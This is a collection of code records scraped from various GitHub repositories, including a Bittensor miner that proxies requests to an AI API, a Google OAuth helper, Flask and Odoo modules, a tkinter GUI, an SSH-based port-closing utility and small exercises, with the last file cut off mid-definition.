...\n\n @abstractmethod\n def images(self, synapse: ImageResponse) -> ImageResponse:\n ...\n\n @abstractmethod\n def embeddings(self, synapse: Embeddings) -> Embeddings:\n ...\n\n def run(self):\n if not self.subtensor.is_hotkey_registered(\n netuid=self.config.netuid,\n hotkey_ss58=self.wallet.hotkey.ss58_address,\n ):\n bt.logging.error(\n f\"Wallet: {self.wallet} is not registered on netuid {self.config.netuid}\"\n f\"Please register the hotkey using `btcli s register --netuid 18` before trying again\"\n )\n exit()\n bt.logging.info(\n f\"Serving axon {StreamPrompting} on network: {self.config.subtensor.chain_endpoint} with netuid: {self.config.netuid}\"\n )\n self.axon.serve(netuid=self.config.netuid, subtensor=self.subtensor)\n bt.logging.info(f\"Starting axon server on port: {self.config.axon.port}\")\n self.axon.start()\n self.last_epoch_block = self.subtensor.get_current_block()\n bt.logging.info(f\"Miner starting at block: {self.last_epoch_block}\")\n bt.logging.info(f\"Starting main loop\")\n step = 0\n try:\n while not self.should_exit:\n start_epoch = time.time()\n\n # --- Wait until next epoch.\n current_block = self.subtensor.get_current_block()\n while (\n current_block - self.last_epoch_block\n < self.config.miner.blocks_per_epoch\n ):\n # --- Wait for next bloc.\n time.sleep(1)\n current_block = self.subtensor.get_current_block()\n # --- Check if we should exit.\n if self.should_exit:\n break\n\n # --- Update the metagraph with the latest network state.\n self.last_epoch_block = self.subtensor.get_current_block()\n\n metagraph = self.subtensor.metagraph(\n netuid=self.config.netuid,\n lite=True,\n block=self.last_epoch_block,\n )\n log = (\n f\"Step:{step} | \"\n f\"Block:{metagraph.block.item()} | \"\n f\"Stake:{metagraph.S[self.my_subnet_uid]} | \"\n f\"Rank:{metagraph.R[self.my_subnet_uid]} | \"\n f\"Trust:{metagraph.T[self.my_subnet_uid]} | \"\n f\"Consensus:{metagraph.C[self.my_subnet_uid] } | \"\n f\"Incentive:{metagraph.I[self.my_subnet_uid]} | \"\n f\"Emission:{metagraph.E[self.my_subnet_uid]}\"\n )\n bt.logging.info(log)\n\n # --- Set weights.\n if not self.config.miner.no_set_weights:\n pass\n step += 1\n\n except KeyboardInterrupt:\n self.axon.stop()\n bt.logging.success(\"Miner killed by keyboard interrupt.\")\n exit()\n\n except Exception as e:\n bt.logging.error(traceback.format_exc())\n\n def run_in_background_thread(self):\n if not self.is_running:\n bt.logging.debug(\"Starting miner in background thread.\")\n self.should_exit = False\n self.thread = threading.Thread(target=self.run, daemon=True)\n self.thread.start()\n self.is_running = True\n bt.logging.debug(\"Started\")\n\n def stop_run_thread(self):\n if self.is_running:\n bt.logging.debug(\"Stopping miner in background thread.\")\n self.should_exit = True\n self.thread.join(5)\n self.is_running = False\n bt.logging.debug(\"Stopped\")\n\n def __enter__(self):\n self.run_in_background_thread()\n\n def __exit__(self, exc_type, exc_value, traceback):\n self.stop_run_thread()\n\n\nclass StreamingTemplateMiner(StreamMiner):\n def config(self) -> \"bt.Config\":\n parser = argparse.ArgumentParser(description=\"Streaming Miner Configs\")\n self.add_args(parser)\n return bt.config(parser)\n\n def add_args(cls, parser: argparse.ArgumentParser):\n pass\n\n\n async def embeddings(self, synapse: Embeddings) -> Embeddings:\n bt.logging.info(f\"entered embeddings processing for embeddings of len {len(synapse.texts)}\")\n\n async def get_embeddings_in_batch(texts, model, batch_size=10):\n batches = [texts[i:i + batch_size] for i in range(0, len(texts), batch_size)]\n tasks = []\n for batch in batches:\n filtered_batch = [text for text in batch if text.strip()]\n if filtered_batch:\n task = asyncio.create_task(client.embeddings.create(input=filtered_batch, model=model, encoding_format='float'))\n tasks.append(task)\n else:\n bt.logging.info(\"Skipped an empty batch.\")\n \n all_embeddings = []\n results = await asyncio.gather(*tasks, return_exceptions=True)\n for result in results:\n if isinstance(result, Exception):\n bt.logging.error(f\"Error in processing batch: {result}\")\n else:\n batch_embeddings = [item.embedding for item in result.data]\n all_embeddings.extend(batch_embeddings)\n return all_embeddings\n\n try:\n texts = synapse.texts\n model = synapse.model\n batched_embeddings = await get_embeddings_in_batch(texts, model)\n synapse.embeddings = batched_embeddings\n # synapse.embeddings = [np.array(embed) for embed in batched_embeddings]\n bt.logging.info(f\"synapse response is {synapse.embeddings[0][:10]}\")\n return synapse\n except Exception as e:\n bt.logging.error(f\"Exception in embeddings function: {traceback.format_exc()}\")\n\n\n async def images(self, synapse: ImageResponse) -> ImageResponse:\n bt.logging.info(f\"received image request: {synapse}\")\n try:\n # Extract necessary information from synapse\n model = synapse.model\n messages = synapse.messages\n size = synapse.size\n quality = synapse.quality\n style = synapse.style\n\n # Await the response from the asynchronous function\n meta = await client.images.generate(\n model=model,\n prompt=messages,\n size=size,\n quality=quality,\n style=style,\n )\n\n image_created = meta.created\n image_url = meta.data[0].url\n image_revised_prompt = meta.data[0].revised_prompt\n # image_b64 = meta.data[0].revised_prompt\n\n image_data = {\n \"created_at\": image_created,\n \"url\": image_url,\n \"revised_prompt\": image_revised_prompt,\n # \"b64\": image_b64\n }\n\n synapse.completion = image_data\n bt.logging.info(f\"returning image response of {synapse.completion}\")\n return synapse\n\n except Exception as e:\n bt.logging.error(f\"error in images: {e}\\n{traceback.format_exc()}\")\n\n\n\n def prompt(self, synapse: StreamPrompting) -> StreamPrompting:\n bt.logging.info(f\"started processing for synapse {synapse}\")\n \n async def _prompt(synapse, send: Send):\n try:\n model = synapse.model\n messages = synapse.messages\n seed=synapse.seed\n bt.logging.info(synapse)\n bt.logging.info(f\"question is {messages} with model {model}, seed: {seed}\")\n response = await client.chat.completions.create(\n model= model,\n messages= messages,\n temperature= 0.0001,\n stream= True,\n seed=seed,\n )\n buffer = []\n N=1\n async for chunk in response:\n token = chunk.choices[0].delta.content or \"\"\n buffer.append(token)\n if len(buffer) == N:\n joined_buffer = \"\".join(buffer)\n await send(\n {\n \"type\": \"http.response.body\",\n \"body\": joined_buffer.encode(\"utf-8\"),\n \"more_body\": True,\n }\n )\n bt.logging.info(f\"Streamed tokens: {joined_buffer}\")\n buffer = []\n\n if buffer:\n joined_buffer = \"\".join(buffer)\n await send(\n {\n \"type\": \"http.response.body\",\n \"body\": joined_buffer.encode(\"utf-8\"),\n \"more_body\": False,\n }\n )\n bt.logging.info(f\"Streamed tokens: {joined_buffer}\")\n print(f\"response is {response}\")\n except Exception as e:\n bt.logging.error(f\"error in _prompt {e}\\n{traceback.format_exc()}\")\n\n token_streamer = partial(_prompt, synapse)\n return synapse.create_streaming_response(token_streamer)\n\ndef get_valid_hotkeys(config):\n global valid_hotkeys\n api = wandb.Api()\n subtensor = bt.subtensor(config=config)\n while True:\n metagraph = subtensor.metagraph(18)\n try:\n runs = api.runs(f\"cortex-t/{template.PROJECT_NAME}\")\n latest_version = get_version()\n for run in runs:\n if run.state == \"running\":\n try:\n # Extract hotkey and signature from the run's configuration\n hotkey = run.config['hotkey']\n signature = run.config['signature']\n version = run.config['version']\n bt.logging.debug(f\"found running run of hotkey {hotkey}, {version} \")\n\n if latest_version == None:\n bt.logging.error(f'Github API call failed!')\n continue\n \n if version != latest_version and latest_version != None:\n bt.logging.debug(f'Version Mismatch: Run version {version} does not match GitHub version {latest_version}')\n continue\n\n # Check if the hotkey is registered in the metagraph\n if hotkey not in metagraph.hotkeys:\n bt.logging.debug(f'Invalid running run: The hotkey: {hotkey} is not in the metagraph.')\n continue\n\n # Verify the signature using the hotkey\n if not bt.Keypair(ss58_address=hotkey).verify(run.id, bytes.fromhex(signature)):\n bt.logging.debug(f'Failed Signature: The signature: {signature} is not valid')\n continue\n \n if hotkey not in valid_hotkeys:\n valid_hotkeys.append(hotkey)\n except Exception as e:\n bt.logging.debug(f\"exception in get_valid_hotkeys: {traceback.format_exc()}\")\n\n bt.logging.info(f\"total valid hotkeys list = {valid_hotkeys}\")\n time.sleep(180)\n\n except json.JSONDecodeError as e:\n bt.logging.debug(f\"JSON decoding error: {e} {run.id}\")\n\n\nif __name__ == \"__main__\":\n with StreamingTemplateMiner():\n while True:\n time.sleep(1)\n","repo_name":"BitAPAI/cortex.t","sub_path":"miner/miner.py","file_name":"miner.py","file_ext":"py","file_size_in_byte":20571,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"71"}
+{"seq_id":"34085669870","text":"\n\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution:\n \"\"\"\n 题意是从右边看一棵树,返回你能看到的全部\n 递归实现,要考虑几种情况:\n 1.最左边左子树高于右子树,则要先返回最左边左子树\n 2.最右边右子树下的左子树高于右子树\n 3.右子树或者左子树刚好成一排\n 解法:先得到最右、最左子树,然后返回结果:root.val+右子树+多出的左子树\n Runtime: 36 ms, faster than 83.42% of Python3 online submissions for Binary Tree Right Side View.\n Memory Usage: 13.8 MB, less than 5.26% of Python3 online submissions for Binary Tree Right Side View.\n \"\"\"\n def rightSideView(self, root: TreeNode) -> List[int]:\n if not root:\n return []\n right = self.rightSideView(root.right)\n left = self.rightSideView(root.left)\n return [root.val] + right + left[len(right):]\n\n\nclass Solution2:\n \"\"\"\n DFS解法,可以说非常巧妙了,核心就在于depth == len(view)\n 通过这个条件牢牢把握上述的三种情况,当左子树低于最右边时,即不满足depth==len(view)\n 而每当遍历到的节点,depth高于当前的depth:即len(view),就添加到结果集,因为递归是从右到左,\n 所以肯定会从右到左的加入节点\n \"\"\"\n def rightSideView(self, root: TreeNode) -> List[int]:\n def collect(node, depth):\n if node:\n if depth == len(view):\n view.append(node.val)\n collect(node.right, depth+1)\n collect(node.left, depth+1)\n view = []\n collect(root, 0)\n return view","repo_name":"sandwu/leetcode_problems","sub_path":"8.tree/199. Binary Tree Right Side View.py","file_name":"199. Binary Tree Right Side View.py","file_ext":"py","file_size_in_byte":1802,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"73792585190","text":"import json\r\nfrom requests_oauthlib import OAuth2Session\r\nfrom oauthlib.oauth2 import TokenExpiredError\r\nfrom oauthlib.oauth2.rfc6749.errors import MismatchingStateError\r\n\r\n\r\n\r\n\r\nclass GoogleLogin:\r\n\t# Client Session\r\n\tauthorization_url = None\r\n\tauth_client = None\r\n\ttoken = None\r\n\t# Config\r\n\tredirect_uri = \"https://localhost:8008/auth\"\r\n\tauthorization_base_url = \"https://accounts.google.com/o/oauth2/auth\"\r\n\ttoken_url = \"https://oauth2.googleapis.com/token\"\r\n\trefresh_url = token_url\r\n\tscope = [ \"https://www.googleapis.com/auth/userinfo.email\", \"https://www.googleapis.com/auth/userinfo.profile\", \"openid\", \"https://mail.google.com/\" ]\r\n\t# info url\r\n\tuser_info_uri = \"https://www.googleapis.com/oauth2/v1/userinfo\"\r\n\t# user data\r\n\r\n\tuser_info = None\r\n\r\n\tdef __init__(self, client_id, client_secret, redirect_uri=None, authorization_base_url=None, token_url=None, scope=None, refresh_url=None, token=None):\r\n\t\t\"\"\"\r\n\t\t\tInit the GoogleAuthClient\r\n\t\t\"\"\"\r\n\t\tself.client_id = client_id\r\n\t\tself.client_secret = client_secret\r\n\t\t# Check if parameter is provided\r\n\t\t# Set if parameter is provided\r\n\t\tif redirect_uri:\r\n\t\t\tself.redirect_uri = redirect_uri\r\n\t\tif authorization_base_url:\r\n\t\t\tself.authorization_base_url = authorization_base_url\r\n\t\tif token_url:\r\n\t\t\tself.token_url = token_url\r\n\t\tif scope:\r\n\t\t\tself.scope = scope\r\n\t\tif refresh_url != token_url:\r\n\t\t\tself.refresh_url = refresh_url\r\n\t\tif token:\r\n\t\t\tself.token = token\r\n\t\t# [ COMPLETE ]\r\n\r\n\tdef load_from_file(self, file_name):\r\n\t\t\"\"\"\r\n\t\t\tParse Google CLient Config.json\r\n\t\t\"\"\"\r\n\t\ttry:\r\n\t\t\tconfig_file = open(file_name, 'r').read()\r\n\r\n\t\t\tconfig_file = json.loads(config_file)[\"installed\"]\r\n\t\t\tself.client_id = config_file[\"client_id\"]\r\n\t\t\tself.client_secret = config_file[\"client_secret\"]\r\n\t\t\tself.authorization_base_url = config_file[\"auth_uri\"]\r\n\t\t\tself.token_url = config_file[\"token_uri\"]\r\n\t\t\tself.refresh_url = self.token_url\r\n\t\t\tself.redirect_uri = \"http://localhost\"\r\n\t\texcept Exception as e:\r\n\t\t\tprint(\"Error Occured when importing config file...\")\r\n\t\t\treturn False\r\n\t\treturn True\r\n\r\n\r\n\r\n\tdef create_auth_url(self, client_id=None):\r\n\t\t\"\"\"\r\n\t\t\tReturns Google Auth URL\r\n\t\t\"\"\"\r\n\t\tif client_id:\r\n\t\t\tself.client_id = client_id\r\n\t\tself.auth_client = OAuth2Session(self.client_id, scope=self.scope, redirect_uri=self.redirect_uri)\r\n\t\tauthorization_url, state = self.auth_client.authorization_url(self.authorization_base_url, access_type=\"offline\", prompt=\"select_account\")\r\n\t\treturn authorization_url\r\n\r\n\r\n\tdef create_token(self, redirect_response,client_secret=None, token_url=None):\r\n\t\t\"\"\"\r\n\t\t\tCreate email auth token\r\n\t\t\"\"\"\r\n\t\tif client_secret:\r\n\t\t\tself.client_secret = client_secret\r\n\t\tif token_url:\r\n\t\t\tself.token_url = token_url\r\n\t\t# \r\n\t\tif not self.token:\r\n\t\t\ttry:\r\n\t\t\t\tself.token = self.auth_client.fetch_token(self.token_url, client_secret=self.client_secret, authorization_response=redirect_response)\r\n\t\t\texcept MismatchingStateError:\r\n\t\t\t\tprint(\"The provided response uri does not coincide with the auth_uri.\\nPlease login with new auth_uri.\")\r\n\t\t\texcept Exception as e:\r\n\t\t\t\tprint(str(e))\r\n\t\t\t\tprint(\"Error Occured in Fetching token. Please Login Again\")\r\n\t\treturn self.token\r\n\r\n\r\n\tdef refresh_token(self, token=None, user_info_uri=None):\r\n\t\t\"\"\"\r\n\t\t\tRefresh Token\r\n\t\t\"\"\"\r\n\t\t# updated token is the previous token\r\n\t\t# in case the token expired, we refresh it\r\n\t\tif token:\r\n\t\t\tself.token = token\r\n\t\tif user_info_uri:\r\n\t\t\tself.user_info_uri = user_info_uri\r\n\t\tupdated_token = self.token\r\n\t\ttry:\r\n\t\t\tupdate_client = OAuth2Session(self.client_id, token=updated_token)\r\n\t\t\tauth_client.get(self.user_info_uri)\r\n\t\texcept TokenExpiredError as e:\r\n\t\t\ttry:\r\n\t\t\t\tupdated_token = self.auth_client.refresh_token(self.refresh_url)\r\n\t\t\t\tself.token = updated_token\r\n\t\t\texcept:\r\n\t\t\t\tprint(\"Error Occured While refreshing token... Please Try Again.\")\r\n\t\t# Return updated_token\r\n\t\treturn updated_token\r\n\r\n\r\n\tdef get_user_info(self):\r\n\t\t\"\"\"\r\n\t\t\tReturns userdata as json\r\n\t\t\"\"\"\r\n\t\tif not self.user_info:\r\n\t\t\ttry:\r\n\t\t\t\tr = self.auth_client.get('https://www.googleapis.com/oauth2/v1/userinfo')\r\n\t\t\t\tself.user_info = r.json()\r\n\t\t\texcept:\r\n\t\t\t\tprint(\"Error Getting User info\")\r\n\t\treturn self.user_info\r\n\r\n\r\n\r\n\tdef get_user_email(self):\r\n\t\t\"\"\"\r\n\t\t\tReturns user email\r\n\t\t\"\"\"\r\n\t\tuser_email = None\r\n\t\tif not self.user_info:\r\n\t\t\ttry:\r\n\t\t\t\tr = self.auth_client.get('https://www.googleapis.com/oauth2/v1/userinfo')\r\n\t\t\t\tself.user_info = r.json()\r\n\t\t\texcept:\r\n\t\t\t\tprint(\"Error Getting User info\")\r\n\t\t# Return user email\r\n\t\ttry:\r\n\t\t\tuser_email = self.user_info['email']\r\n\t\t\tprint(\"User Email Found: \" + user_email)\r\n\t\texcept:\r\n\t\t\tprint(\"Unable to parse user info\")\r\n\t\treturn user_email","repo_name":"CypherpunkSamurai/Gmail-Cleaner","sub_path":"login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":4617,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"70349124390","text":"def _genlex_impl(ctx):\n \"\"\"Implementation for genlex rule.\"\"\"\n\n # Compute the prefix, if not specified.\n if ctx.attr.prefix:\n prefix = ctx.attr.prefix\n else:\n prefix = ctx.file.src.basename.partition(\".\")[0]\n\n # Construct the arguments.\n args = ctx.actions.args()\n args.add(\"-o\", ctx.outputs.out)\n args.add(\"-P\", prefix)\n args.add_all(ctx.attr.lexopts)\n args.add(ctx.file.src)\n outputs = [ctx.outputs.out]\n ctx.actions.run(\n executable = ctx.executable._flex,\n arguments = [args],\n inputs = ctx.files.src + ctx.files.includes,\n outputs = outputs,\n mnemonic = \"Flex\",\n progress_message = \"Generating %s from %s\" % (\n ctx.outputs.out.short_path,\n ctx.file.src.short_path,\n ),\n )\n return [\n DefaultInfo(files = depset(direct = outputs)),\n ]\n\nflex = rule(\n _genlex_impl,\n attrs = {\n \"src\": attr.label(\n mandatory = True,\n allow_single_file = [\n \".l\",\n \".ll\",\n \".lex\",\n \".lpp\",\n ],\n doc = \"The .lex source file for this rule\",\n ),\n \"includes\": attr.label_list(\n allow_files = True,\n doc = \"A list of headers that are included by the .lex file\",\n ),\n \"out\": attr.output(\n mandatory = True,\n doc = \"The generated source file\",\n ),\n \"prefix\": attr.string(\n doc = \"External symbol prefix for Flex. This string is \" +\n \"passed to flex as the -P option, causing the resulting C \" +\n \"file to define external functions named 'prefix'text, \" +\n \"'prefix'in, etc. The default is the basename of the source\" +\n \"file without the .lex extension.\",\n ),\n \"lexopts\": attr.string_list(\n doc = \"A list of options to be added to the flex command line.\",\n ),\n \"_flex\": attr.label(\n default = Label(\"@flex//:flex_bin\"),\n executable = True,\n cfg = \"host\",\n ),\n },\n provides = [\n DefaultInfo,\n ],\n)\n","repo_name":"fuhailin/rules_deps","sub_path":"third_party/flex/flex.bzl","file_name":"flex.bzl","file_ext":"bzl","file_size_in_byte":2188,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"}
+{"seq_id":"33881907565","text":"from odoo import api, fields, models\n\n\nclass Board(models.AbstractModel):\n _name = 'board.board'\n _description = \"Board\"\n _auto = False\n\n # This is necessary for when the web client opens a dashboard. Technically\n # speaking, the dashboard is a form view, and opening it makes the client\n # initialize a dummy record by invoking onchange(). And the latter requires\n # an 'id' field to work properly...\n id = fields.Id()\n\n @api.model_create_multi\n def create(self, vals_list):\n return self\n\n @api.model\n def get_view(self, view_id=None, view_type='form', **options):\n \"\"\"\n Overrides orm field_view_get.\n @return: Dictionary of Fields, arch and toolbar.\n \"\"\"\n\n res = super().get_view(view_id, view_type, **options)\n\n custom_view = self.env['ir.ui.view.custom'].sudo().search([('user_id', '=', self.env.uid), ('ref_id', '=', view_id)], limit=1)\n if custom_view:\n res.update({'custom_view_id': custom_view.id,\n 'arch': custom_view.arch})\n res['arch'] = self._arch_preprocessing(res['arch'])\n return res\n\n @api.model\n def _arch_preprocessing(self, arch):\n from lxml import etree\n\n def remove_unauthorized_children(node):\n for child in node.iterchildren():\n if child.tag == 'action' and child.get('invisible'):\n node.remove(child)\n else:\n remove_unauthorized_children(child)\n return node\n\n archnode = etree.fromstring(arch)\n # add the js_class 'board' on the fly to force the webclient to\n # instantiate a BoardView instead of FormView\n archnode.set('js_class', 'board')\n return etree.tostring(remove_unauthorized_children(archnode), pretty_print=True, encoding='unicode')\n","repo_name":"odoo/odoo","sub_path":"addons/board/models/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"en","doc_type":"code","stars":31745,"dataset":"github-code","pt":"71"}
+{"seq_id":"20530229853","text":"import os\nfrom flask import Blueprint, jsonify, request\nfrom flask_login import login_required, current_user\nimport requests\nfrom .aws_s3 import upload_file_to_s3, get_unique_filename, ALLOWED_EXTENSIONS, remove_file_from_s3\n\nfrom app.models import db, Review, ReviewImage, Vote\n\nvote_routes = Blueprint('votes', __name__)\n\n# ------------------------ EDIT VOTE ------------------------\n@vote_routes.route('/', methods=['PUT'])\n@login_required\ndef edit_vote(vote_id):\n vote = Vote.query.get(vote_id)\n if not vote:\n return jsonify({'error': 'Vote not found'}), 404\n\n if vote.user_id != current_user.id:\n return jsonify({'error': 'You are not authorized to edit this vote'}), 403\n\n vote_type = request.json.get('vote_type')\n if vote_type not in [-1, 1]:\n return jsonify({'error': 'Invalid vote type. Vote type should be either 1 or -1'}), 400\n\n vote.vote_type = vote_type\n db.session.commit()\n\n return jsonify(vote.to_dict()), 200\n\n\n# ------------------------ DELETE VOTE ------------------------\n@vote_routes.route('/', methods=['DELETE'])\n@login_required\ndef delete_vote(vote_id):\n vote = Vote.query.get(vote_id)\n if not vote:\n return jsonify({'error': 'Vote not found'}), 404\n\n if vote.user_id != current_user.id:\n return jsonify({'error': 'You are not authorized to delete this vote'}), 403\n\n db.session.delete(vote)\n db.session.commit()\n\n return jsonify({'message': 'Vote deleted successfully'}), 200\n","repo_name":"sydneycendana/workshop","sub_path":"app/api/vote_routes.py","file_name":"vote_routes.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"15356391446","text":"inicio = int(input())\nfim = int(input())\nprimos = 0\nfor i in range(inicio, fim + 1):\n div = 0\n for j in range(1, i + 1):\n if i % j == 0:\n div += 1\n if div == 2:\n primos += 1\n print(i)\n\nprint(f'primos: {primos}')\n","repo_name":"juiasi/ProjetosFaculdade","sub_path":"lp_atividades/AC2/intervalo_primos.py","file_name":"intervalo_primos.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"32268919010","text":"import tkinter as tk\nimport utils\nfrom tkinter import ttk\nfrom tkinter.messagebox import showerror\n\n\nclass TrashApp(tk.Tk):\n def __init__(self, bridge_callback, bridge_on_close_window_callback):\n super().__init__()\n self.bridge_callback = bridge_callback\n self.actual_trash = 0\n self.trash_capacity = 0\n self.is_trash_locked = False\n self.bridge_on_close_window_callback = bridge_on_close_window_callback\n\n # Close window event\n self.protocol('WM_DELETE_WINDOW', self._close_button)\n\n # Set main attributes\n self.title('Lixeira')\n self.geometry('600x400+50+50')\n self.resizable(False, False)\n\n # Entry\n self.entrythingy = tk.Entry()\n self.entrythingy.pack()\n\n # Labels\n self.trash_capacity_label = ttk.Label(self, text='Capacidade máxima de lixo: 0')\n self.trash_capacity_label.pack(ipadx=10, ipady=10)\n self.actual_trash_label = ttk.Label(self, text='Quantidade de lixo atual: 0')\n self.actual_trash_label.pack(ipadx=10, ipady=10)\n\n # Buttons\n self.put_trash_button = ttk.Button(self, text='Adicionar lixo', command=self._put_trash_button_callback)\n self.put_trash_button.pack(ipadx=5, ipady=5, expand=False)\n self.clear_trash_button = ttk.Button(self, text='Esvaziar lixeira', command=self.clear_trash_button_callback)\n self.clear_trash_button.pack(ipadx=5, ipady=5, expand=False)\n self.lock_trash_button = ttk.Button(self, text='Travar lixeira', command=self.lock_trash_button_callback)\n self.lock_trash_button.pack(ipadx=5, ipady=5, expand=False)\n\n # String Variable\n self.trash_capacity_stringVar = tk.StringVar()\n self.trash_capacity_stringVar.set(\"0\")\n self.entrythingy[\"textvariable\"] = self.trash_capacity_stringVar\n\n # Binds\n self.entrythingy.bind('', self._set_trash_capacity)\n\n def _close_button(self):\n self.bridge_on_close_window_callback()\n self.destroy()\n\n def _set_trash_capacity(self, event):\n if self._is_capacity_valid():\n self.trash_capacity = int(self.trash_capacity_stringVar.get())\n self.trash_capacity_label['text'] = 'Capacidade máxima de lixo: ' + str(self.trash_capacity)\n self._bridge_callback()\n\n def _is_capacity_valid(self):\n if not utils.is_int(self.trash_capacity_stringVar.get()):\n showerror('Erro', 'A capacidade digitada deve ser um número inteiro')\n return False\n capacity_typed = int(self.trash_capacity_stringVar.get())\n if capacity_typed < 0:\n showerror('Erro', 'A capacidade máxima da lixeira que foi digitada não pode ser menor que zero')\n return False\n if capacity_typed < self.actual_trash:\n showerror('Erro', 'A capacidade máxima da lixeira que foi digitada é menor que a quantidade de lixo atual')\n return False\n return True\n\n def _put_trash_button_callback(self):\n if self._is_possible_to_put_more_trash():\n self.actual_trash += 1\n self._change_actual_trash_label()\n self._bridge_callback()\n if self._should_auto_lock_trash():\n self.lock_trash_button_callback()\n\n def clear_trash_button_callback(self):\n self.actual_trash = 0\n self._change_actual_trash_label()\n self._bridge_callback()\n\n def _should_auto_lock_trash(self):\n if self.trash_capacity != 0 and self.trash_capacity == self.actual_trash:\n return True\n return False\n\n def _change_actual_trash_label(self):\n self.actual_trash_label['text'] = 'Quantidade de lixo atual: ' + str(self.actual_trash)\n\n def _is_possible_to_put_more_trash(self):\n if self.trash_capacity > self.actual_trash:\n return True\n return False\n\n def _bridge_callback(self):\n self.bridge_callback(self.trash_capacity, self.actual_trash, self.is_trash_locked)\n\n def lock_trash_button_callback(self):\n self.put_trash_button.state(['disabled'])\n self.lock_trash_button.state(['disabled'])\n self.is_trash_locked = True\n self._bridge_callback()\n\n def unlock_trash(self):\n self.put_trash_button.state(['!disabled'])\n self.lock_trash_button.state(['!disabled'])\n self.is_trash_locked = False\n self._bridge_callback()\n","repo_name":"TomasCartman/redes_01","sub_path":"client_folder/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":4431,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"27549884469","text":"import string\n\nimport constants\nfrom handler.DatabaseHandler import DatabaseHandler\nfrom handler.NmapHandler import NmapHandler\nfrom handler.ssh.SshHandler import SshHandler\n\n\n# Class responsible for solving ip security issues.\nclass IpIssueSolver:\n def __init__(self, configuration):\n self.configuration = configuration\n self.database_handler = DatabaseHandler(constants.MONGO_URI)\n\n # Fix implementation if too many ports are open a given host.\n def fix_too_many_open_ports(self, ip: string):\n # get ssh information of last nmap scan from database\n nmap_handler = NmapHandler()\n ssh_information = nmap_handler.get_ssh_information_by_ip(ip)\n\n # get latest nmap scan from database\n nmap_report_db = self.database_handler.select_latest_entry(constants.COLLECTION_NAME_NMAPRUN)\n host_information = nmap_handler.get_host(nmap_report_db['nmaprun'], ip)\n\n if host_information is None:\n return 'Host not found!'\n\n # connect to host with ssh\n ssh_handler = SshHandler(ssh_information.ip, ssh_information.port,\n constants.SSH_USER, constants.SSH_PASSWORD)\n ssh_handler.connect()\n\n # read allow/listed ports\n allow_list_ports = self.configuration['allow_list_port']\n allow_list_ports = allow_list_ports.split('\\n')\n # remove useless spaces\n allow_list_ports = [port.strip() for port in allow_list_ports]\n\n # add current ssh port otherwise connection will be cut off\n allow_list_ports.append(str(ssh_information.port))\n\n # kill all ports/application which are not in the allow-list\n killed_ports = []\n for port in host_information.ports:\n if (port['@protocol'] == 'tcp') and (not port['@portid'] in allow_list_ports):\n output = ssh_handler.execute_command('sudo fuser -k ' + str(port['@portid']) + '/tcp')\n if output:\n killed_ports.append(output[0].split('/')[0])\n\n ssh_handler.disconnect()\n\n # return status\n if killed_ports:\n return 'Successfully killed ports ' + str(killed_ports) + ' on host ' + str(ip) + '!'\n else:\n return 'No ports killed!'\n","repo_name":"Ric1234567/DigitalTwinsForIoTSecurityManagement","sub_path":"flask-backend/analysis/ip/IpIssueSolver.py","file_name":"IpIssueSolver.py","file_ext":"py","file_size_in_byte":2254,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"13368408801","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom timm.models.layers import DropPath\nimport timm\nimport math\n\n\nclass ConvBNReLU(nn.Sequential):\n def __init__(self, in_channels, out_channels, kernel_size=3, dilation=1, stride=1, norm_layer=nn.BatchNorm2d,\n bias=False):\n super(ConvBNReLU, self).__init__(\n nn.Conv2d(in_channels, out_channels, kernel_size=kernel_size, bias=bias, dilation=dilation, stride=stride,\n padding=((stride - 1) + dilation * (kernel_size - 1)) // 2),\n norm_layer(out_channels),\n nn.ReLU6()\n )\n\n\nclass ConvBN(nn.Sequential):\n def __init__(self, in_channels, out_channels, kernel_size=3, dilation=1, stride=1, norm_layer=nn.BatchNorm2d,\n bias=False):\n super(ConvBN, self).__init__(\n nn.Conv2d(in_channels, out_channels, kernel_size=kernel_size, bias=bias, dilation=dilation, stride=stride,\n padding=((stride - 1) + dilation * (kernel_size - 1)) // 2),\n norm_layer(out_channels),\n )\n\n\nclass Conv(nn.Sequential):\n def __init__(self, in_channels, out_channels, kernel_size=3, dilation=1, stride=1, bias=False):\n super(Conv, self).__init__(\n nn.Conv2d(in_channels, out_channels, kernel_size=kernel_size, bias=bias, dilation=dilation, stride=stride,\n padding=((stride - 1) + dilation * (kernel_size - 1)) // 2)\n )\n\n\nclass SeparableConvBNReLU(nn.Sequential):\n def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, dilation=1, norm_layer=nn.BatchNorm2d):\n super(SeparableConvBNReLU, self).__init__(\n nn.Conv2d(in_channels, in_channels, kernel_size, stride=stride, dilation=dilation,\n padding=((stride - 1) + dilation * (kernel_size - 1)) // 2, groups=in_channels,\n bias=False),\n norm_layer(out_channels),\n nn.Conv2d(in_channels, out_channels, kernel_size=1, bias=False),\n nn.ReLU6(),\n )\n\n\nclass SeparableConvBN(nn.Sequential):\n def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, dilation=1, norm_layer=nn.BatchNorm2d):\n super(SeparableConvBN, self).__init__(\n nn.Conv2d(in_channels, in_channels, kernel_size, stride=stride, dilation=dilation,\n padding=((stride - 1) + dilation * (kernel_size - 1)) // 2, groups=in_channels,\n bias=False),\n norm_layer(out_channels),\n nn.Conv2d(in_channels, out_channels, kernel_size=1, bias=False),\n )\n\n\nclass SeparableConv(nn.Sequential):\n def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, 